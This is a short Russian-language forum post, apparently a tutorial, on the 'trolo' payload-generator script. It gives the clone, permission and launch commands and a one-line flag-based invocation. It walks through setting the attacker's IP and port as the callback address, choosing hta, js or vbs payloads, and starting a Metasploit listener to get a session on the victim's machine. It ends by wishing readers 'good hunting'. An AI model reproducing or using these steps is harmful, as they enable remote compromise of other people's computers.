Итак речь пойдет о trolo, скрипте для создания полезной нагрузки. Форматов нагрузки в нем не так много но все же думаю может кому и пригодится сие чудо. Начнем с установки git clone https://github.com/b3rito/trolo копируем chmod +x trolo.sh даем права на запуск ./trolo.sh запуск скрипта и если все чудесно то получаем это идем далее, как видно нам предлагается заполнить данные для генерации нагрузки IP: 192.167.1.5 (пишем свой IP) порт (по умолчанию 443) я его оставил так же Имя файла полезной нагрузки (lolz) архитектура (х86/х64) в роли жертвы мой комп с архитектурой х86 формат нагрузки (как видим список довольно небольшой (hta, js, vbs, custom) я выбрал в качестве теста нагрузку в hta также можно сгенерировать нагрузку данной командой ./trolo.sh -i [IP] -p [PORT] -n [NAME] -f [FORMAT] -a [ARCH. x86/x64] p.s. также у нас сохраняется не только нагрузка выбранного формата, но и код нагрузки в текстовом формате txt далее нам предлагается запустить метасплоит для прослушки, разумеется пишем yes ну и собственно после доставки полезной нагрузки получаем сессию Спасибо всем за внимание и доброй охоты